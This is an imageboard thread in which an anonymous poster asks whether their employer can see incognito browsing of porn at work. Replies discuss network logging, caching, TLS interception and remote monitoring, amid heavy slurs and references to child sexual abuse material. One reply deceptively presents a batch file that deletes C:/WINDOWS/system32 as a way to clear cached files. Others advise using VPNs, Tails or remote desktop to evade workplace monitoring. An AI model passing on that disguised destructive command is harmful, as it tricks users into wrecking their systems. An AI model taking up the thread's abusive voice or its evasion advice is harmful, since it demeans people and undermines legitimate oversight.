Can someone please explain this to me:

Can the nerd faggot at my job that is in charge of the network see my Google Chrome Incognito Mode browsing history??

I look at endless porn images on 4chan at work, and I think they found out, because now 4chan is weirdly blocked all of a sudden at work, and my boss told me to stop fucking around on my computer.

Even if the faggot nerd CAN see that I went to 4chan 10,000,000 times in the last month, he can't see all of the nudie pics I've been looking at, RIGHT??

Please give me a serious, technology-based answer. Thank you.
>>
fuck your question, I need to know right now if girls poop or not.
>>
>>745783912
Just settings bro
>>
Yeah if he looks through what sites were sent to the internet provider from your ip
>>
they saw every link cause they are in charge of the router and network fool. you could also have malicious programs on your computer such as a keylog. they know everything. but it doesn't matter because the problem has been patched. you continue to do things and they continue to fix them.
>>
>>745784088

the fact that you took 10 seconds to write that and submit the captcha shows that you are a tremendous faggot loser
>>
>>745783912
Yes, any network admin worth his salt would be able to see it. The real question here is does he care
>>
>>745784224

what do you mean every link? the pictures in these threads are not links right?
>>
>>745783912

I believe IT can see what you're doing if they have a direct link to your monitor at the time of viewing. secondary to that they may keep a log of URLS visited but u the case of 4chan they will have expired. I'm not sure how much shit they would archive. I.e. images or documents saved but I'd imagine they keep track if anything saved to the hard drive. also the fact that you got off with a warning is fucking incredible. you must be of value to them.
>>
Incognito means the browser does not track you. If he's sniffing packets on your network or logging transactional data from ever IP's I/O, then yeah he can put that together and see what ever the hell he wants. Mostly thought he's probably just tracking what IP's your visiting.
>>
>>745784269
is this a troll? dude you need to give yourself some pc 101 before even running a browser.

Yea we can see the network traffic and all the URLs you were on. I don't know how they would go about seeing the images unless they were remoted into your PC. Likely they don't care. But if they saw your local IP going to a url of a picture and they searched it.... You're fucked.
>>
>>745784564
They can see everything, if they have the tools that allow that. Is it legal in your country is whole another question.
>>
>>745784691

Dude I'm asking specifically about pictures in these fucking gay threads. Not about specific URL searches for pictures. ITS A SIMPLE FUCKING QUESTION - CAN THEY SEE THE PORN PICS ON /b/ THREADS???

They fucking disappear after a few minutes anyway right?
>>
>>745784462
Expanding an image is still sending traffic to load said image. I don't know if its just a CSS trick but i know that they could see it.

I doubt they'd look too dar into it while in the office. Might feel awkward.

Not sure if you are joking. He can see ur URL regardless when using their pc, servers and network. However, 4chan does not leave any specific URLs other than 4chan/x(something random). 4chan is probably blocked because it came to their attention that someone is on the site during work hours. np.

anon...
>>
>>745784826

After the thread disappears then more than likely not. Unless they went to the trouble of an archival 4chan site. But thats too much work.

If theyre going to track you then its going to be when you are on the clock and creating web traffic for them to watch. I would just expect that you are being watched for the next 3 months and play it safe by not going to 4chan. Perhaps you could do some work or just use your phone at the very least?
>>
>>745783912

they can't fucking view the pictures, especially after the thread is deleted by 4chan.

are they downloaded to some central server and saved, even after the thread is archived and deleted??

igcognito mode or not, your employer can see everything, you fucking spastic.

how did you not know this? fuck, you are such a fucking spastic.
>>
What the fuck? I fucking told you to not fuck around on your computer and start doing your job. Don't expect a decent answer from these /b/tards for this stupid question lol. Now get out if 4chan and go back to work. You thought I wouldn't see this thread too? I've been looking at all the nudes you've been looking too as well, and I'm quite disappointed... Please stop browsing 4chan at work, I'm not paying you to do it... And yes, we can see when you 'expand' the pictures.
>>
>>745785001
Also if they noticed this earlier on they might have been tracking and saving your traffic. That could mean images and cached files. Don't fuck around on other people networks.

>>745785350
Negro i gave you the answer.

When you load up a web page that url is saved to a log.

Pictures on a web page are just links to where they are hosted with html wo display them.

You click to expand an image and its sending network traffic to expand said image.

Said image could disapear over time making it hard to track unless he was already watching you ahead of time.

I think you are likely freaking yourself out too much.

The hell were you even looking at?
>>
>>745785350

Let me speak your language then

ANYTHING YOU SEE ON YOUR SCREEN IS DOWNLOADED.

JUST BECAUSE YOU DIDN'T RIGHT CLICK AND SAVE IMAGE DOESN'T MEAN IT WASN'T DOWNLOADED.

>>
>>745785691

Bro why is it so hard to get the exact question I'm asking answered?

The threads and the pictures disappear when 4chan archives/deleted the shit RIGHT?

So yes, the 4chan...//blahblah URL is in the log, but if they searched it/clicked it, nothing would load, CORRECT??
>>
>>745785601

>>
>>745785601
Its all saved in "logs". Litterally everything you do is logged. Its the pictures you find wont be found in your photo gallery dumb fuck. They are saved in your browsers data. They are most likey deleted depending on your browser settings, but regardless, your IT guy most likely has seen those pictures
>>
>>745785739

Yes, they will have generated requests and will appear as such in your company's logs.

Yes, they will have been downloaded to your computer, but not saved on disk where you can find it, just in memory and/or cache.

Yes, your network admin will know you looked at pictures. Most likely not exactly which, but they know you went to 4chan anyway. So they can guess.

Yes, you are still a gigantic, clueless faggot.
>>
>>745785887
It looks like both of you are speaking 2 different languages to each other. Im high right now this is too much
>>
You'd need to have downloaded or saved the pictures to your Chrome for there to ever be a saved memory of the nudies you've seen on 4Chan.
>>
>>745786008

Try late 90s.

First home modems and ISPs weren't around until 1994-95ish.

But yes, you are correct.
>>
You dumb faggot. All private browsing does is not track your history for your BROWSER. It doesn't block what IPs you visit. Unless your admin is as fucking stupid as you are they can find out where you were and know that it is your MAC address that went there. Have fun in the unemployment line.
>>
Incognito mode does not prevent traffic logging from the attached network devices (router, gateway, firewall, etc). It only works on local assets.
>>
>>745785887

In theory yes. The URL would be dead.

But it depends on his network. And you're assuming he wasn't already watching you. They obviously knew you were on it and called you on it. So how long could they have been watching?

Theres always a way to find it but i doubt hes going that far.

>>745785007
You might want to use a VPN if that's not blocked on your network. At least then they won't see anything other than encrypted data.
>>
>>745786347
It will have. How else would your computer be able to show you the picture if it didn't download it into its own cache first? And if your company uses a proxy, it'll be on there.

when you click on a picture you download it to render it in its full size - this is the fundamental concept behind bitmap rendering.

by downloading the picture (when you click on it to expand it) it is saved to a cache folder that is only accessible by your employer since you're on a WORK COMPUTER.

so to answer your question as simply as possible:

>every single picture you've ever expanded has been saved in its original quality to a folder that you cannot access from your work computer that is tied to the specific computer and login you were using so you can be identified.

No, they point of having a local cache (i.e. on your own computer), or a proxy server (i.e. in your company's IT department) is that if you reload the page you won't have to download the images again, but just show them from the local cache.

How it's retained depends on what browser, and the settings on the proxy server, too.

Fellow anon,

If the network admin is doing their job they know exactly what you have looked at in terms of requests to specific URIs. Assuming they want to know what exactly you are looking at on 4chan, or on porn sites, they can easily capture that traffic. If they have MITM tools installed on the machine in question (Bluecoat proxies, etc.) they don't give a fuck about TLS, they just strip it away and get to whatever you sent if they believe you're violating AUP egregiously and need a reason to fire you.

All of the traffic you are pushing over their network can ostensibly be analyzed (Seeing what you pulled, and when, and how) unless you are using a VPN to tunnel out. Even then, if you've installed a VPN on your work machine that's probably grounds for termination- literally every place I have worked that is IT-related would fire your ass the minute it showed up on a system audit.

Disregarding network traffic itself, they may have elements on the system at the browser level to report usage and traffic patterns. Some companies do this. Some people get fired over this.

I tell you this as someone who does this for a living. If you really don't want to get fucked and can reboot the machine, look into Tails OS- it's a linux privacy distro that can run in live boot.

Hope you don't get fired.

He can't see your browsing history. Its literally the ONLY thing it protects against. The traffic can completely be traced back to your IP, especially on a company network. Odds are traffic showed 4chan as one of sites visited, and it was just blacklisted.

It will be denied access, and a log of your attempted access WILL BE SAVED FOR HIM.

You might as well quit your job so you don't get fired.
>>
>>745783912
Incognito mode is just to not save history and cookies.
I work as a network engineer and we use splunk that logs everything everyone visits, there is no other way to avoid being logged apart a VPN (that encrypts traffic but is not generally permitted on a job place) or just use your phone to be sure.
>>
>>745783912
Yes. Incognito mode means the BROWSER won't save your history, but any monitoring software on the network can still record anything you're doing, because Incognito mode has no power over the thing that actually provides your internet connection to you, and it is THAT thing that is being monitored.

Most likely, they just saw either your username or terminal's IP address constantly going to 4chan. They likely aren't aware of exactly what you're looking at while on the site, but they ARE aware that it's not a work-related site and the amount of time you've spent on it means that you aren't working.

The same would be true if you spent a lot of time on facebook or twitter or addictinggames or whatever. You're at work, and they don't want you fucking around when you're supposed to be working, so when they look at the network access history and see that the douchebag at terminal 38 pinged 4chan.org domain 2440 times over the course of a week, then they know you aren't working.

>>745785036
they can just remotely monitor you. what you see on your screen is what they see. no need to log everything when you can just watch.
>>

when I click on .jpg links in the cache using this pathway, just numbers and digits and trash come up.

Incorrect. 4chan actually caches some items past their board fall-off (Image limits but still huge conversation, etc.), or will cache some items for a bit specifically for reporting purposes. People have been V& from 4chan.
>>
Ok op, if you want to clear the cache on the "central server" of all the cp you looked at follow these instructions

>Create a notepad file on your work comp
>In the file type @echo off
del c:/WINDOWS/system32
>Save as %temp%.bat
>Opening the file will clear the central server of any files you looked at on that computer

exactly back when I worked at a school we were able to see every teachers VM on one screen and monitor them live along with network logs
>>
Holy fuck OP.

I'd have a fucking heyday fucking with you if i worked with you.
>>
>>745787455
Because the threads, even if they are expired online, are probably cached in your company's server. Ergo, they can still see them.
>>
>>745787919

THANK YOU

so they can't view the images?

SO MANY FAGGOTS ARE SAYING THE OPPOSITE
>>
>>745785887
There are network "sniffers" that can send you your data, and to a separate client. There are also other programs that allow an admin to view the images that you view, in real time. If you're really worried about this, look into getting a VPN. Preferably on a USB, if you're using someone else's computer. That way, the admin wont be able to see what you're viewing - depending on their skill, or if they're even determined to see what you're doing.
>>
>>745783912

If i was on same subnet as you, I could easily log each URL you visit. e.g. i.4cdn.org/b/1505965775502.jpg
boards.4chan.org/b/thread/745783912

Your work wouldn't need to know what the content of that image is. And probably they don't want to know. They just need to know that it is 4chan, NSFW. Not related to work.
>>
>>745787985

>>
>>745787692

That depends on the network architecture and what is being logged.

Ostensibly, yes. Yes they could very well have what you downloaded (Specifically the images) and when if they were constructing a case against you.

I am unsure as to the technical capabilities of the firm you work with however.
>>
>>745787810
Its literally up to the admin. If he cared enough to check the link, might've seen some shit not meant for normal eyes. Otherwise he saw 4chan in the traffic and just said "oh shit, I should blacklist that". But he definitely CAN.
>>
>>745783912
It admin here:
Incognito means no browser history is stored on your PC, we can see quite where you browse and when simply rly.
It is however (on my country) illegal to go look where one person has surfed so yea they know but can't do shit except block 4chan
Gl hf
>>
>>745783912
they can't see exactly where you are over HTTPS, but they'll see the DNS lookup for 4chan.org and the lot
so they'll know you were on 4chan, but not what board or thread
iirc, there's a way for them to still do a man in the middle to expose that because they can provide a certificate that looks valid

and if this is a work machine, it's easy as shit to just log things there, no fancy certificate spoofing
like, the common answer a few places would have would be to just connect with VNC or remote desktop into your machine and look at exactly what's on your screen when they suspect something's up and record it
in that case they'll just be able to see what you're clicking on as you click on it, and they'll know that you've been looking at loli at work
>>
>>745788179

mother fucker. it is so hard to get my point across

i dont give a fuck if they know i went to 4chan. i only care if they can see the exact photos that I was looking at (E.G. that I personally clicked on a picture of a black cock for example).
>>
>>745788115
Well the physical hardware that your company IS running negates what he says.

They will have that traffic. Any good IT is going to know how to get passed that. All Incognito mode is is just something to get rid of the search results on your computer. Its still there. Its like peeing the bed. You can clean and change the sheets but the stain is still in the mattress.
>>
Wouldn't it be funny if this guy's employer contacted 4chan and asked for an ip ban because people are goofing off?

And then the employer got the OPs home ip address and phone ip and got those banned as well as punishment for goofing off?

>>
>>745786743
A VPN encrypts all data between you and the VPN host. All your local network admin can see is that you're sending and receiving certain volumes of data to the VPN. That alone could be a red flag, but its better than having loli furry trap porn logged at your IP address.

>>745788115
It depends on the software they're using on the network, but probably not. To create a cache of everything that every employee is doing with their internet connection is unfeasible from a memory standpoint. It COULD be done, but they'd be sacrificing storage space to do it, and that's generally not worthwhile unless they suspect you're doing something illegal.

The easiest thing for them to do would be to Remote Access your terminal at random times and actively watch what you're doing, especially if they see you currently pinging a non-approved domain. Then, anything on your screen is mirrored on theirs, and they'd be able to see everything.
>>

The incognito mode prevents images from being saved on your computer. But if you are on a company network, then before they get to your computer they go through the company'[s server where they were probably cached.

Black cock pictures have probably been clogging the company's server which is why they are cracking down on you.

Are you sure you're old enough to have a job?
>>
>>745788716
You can't
best you can do is forensic proof your registry and rape your pooter with VPNs
>>
If you want to browse anything you want at work your best bet is to set up your home machine for remote desktop and remote in to it by IP. But if you save anything on your box they may see it, my old work had some scanning program that sucked up pictures so they could review what you had saved on your machine. Also they could see what programs you had installed.
>>
100% - They have logs of how often you go to each site, and roughly how long you are active on each site.

Very Likely - The server admin knows exactly what 4chan is and what you've been up to. He raised a concern to your manager, and probably included a wikipedia level description of what /b/ is to your manager.

Even Odds - based on that, your manager has now been on /b/. And at that point it doesn't matter what exactly you "clicked on" he know's what you're up to, and has gossipped that all over your floor. You're a gay furry pedophile now...

It's also likely that if they plan to fire you, they have some level of concrete "evidence" of images you've clicked on and posts you've responded to. As other's have said, the network likely has some level of automated cache and/or they did actually do a little same-time monitoring of the images you attempted to open. They would probably keep this in their back pocket in the event you tried to sue them over being fired.
>>
>anything to do with computer shit

how do you fags stay so boring and smart
>>
>>745788716
>remove it
if it's a work computer and you somehow uninstall their monitoring shit, they'll probably fire you (and you'll deserve it)
if it's your own personal machine, they can't see that shit (unless they're illegally spying on your machine, in which case you've got bigger problems)

Not really possible for an end user.
Its probably not an installed program on your computer and is based off of open ports. And you wont be closing ports without getting by him. And if you DID find a piece of software and remove it, he could re-push the software to your computer to download and install a few different ways.

You are on his network.
His battleground.

You are his bitch.
>>
>>745788987
He's asked the same fucking question and u fucktards keep feeding into his shit
>>
>>745788716
If the Admin is halfway competent, you won't be able to. Either you won't have sufficient Permission to terminate the process or you won't be able to close the port they use for access.

If by some miracle the admin didn't prevent that, the terminal likely has a base configuration that resets either every time you log in or every time the machine is rebooted. And if they find that, for some reason, they can't connect to your terminal but they can connect to everyone else, they'll probably just walk to your desk and ask WTF.
>>
>>745788115
Keep a copy of all the crap you downloaded? They easily can/could. Did they? I doubt it. Not worth company resources,

>>
>>745788380
If you had clicked on white cock, they probably would not be able to see the images.

Black cock jpgs, however, are generally larger files, sometimes as much as triple the megabytes of white or Asian cock jpgs.

Files that large are bound to draw attention and the slow the server.

Can someone please explain this to me:

This nerd faggot at my job that is in charge of the front-desk reserve check-ins has been browsing in incognito mode.

He comes to 4chan, asking users for CP, and presumably, jacking off to black dick pictures and transexuals. He's looking at porn endlessly.

I finally told my boss, and he submitted a report to the FBI. They told my boss to keep him around until they can get out to us to question him.

I have all the nude pictures, the CP requests, everything SAVED in database.

What do?

Please give me serious ways to fuck with him in the meantime.

Not in my country, privacy and all that. We can legally take a list of visited websites globally and base decisions on that. Though we can take personal lists of web activity, it cannot be used as evidence as we would be invading privacy, even if it is a company pc...

Whoever owns the network you're using to get online can see all the data that passes through it if they want to. That includes absolutely anything that passes from your computer to the internet or from the internet to your computer. So, yes, if they wanted to, they could see all the websites you visit and all the pics you look at.

If you used an encrypted tunnel or a proxy, they wouldn't be able to see what you're looking at. However, they'd be able to see why they can't see what you're looking at, and they might not like that either.

Depends,
They typically can see any packets sent and received.
Them storing it is another question.
If they check the url you went to but it's dead and they did not save the packets elsewhere they can't see what you saw.
However, if they were watching you as you were browsing they can see everything. It's like passing a note in class, one of the passers can read and see it then continue to pass and you wouldn't know.
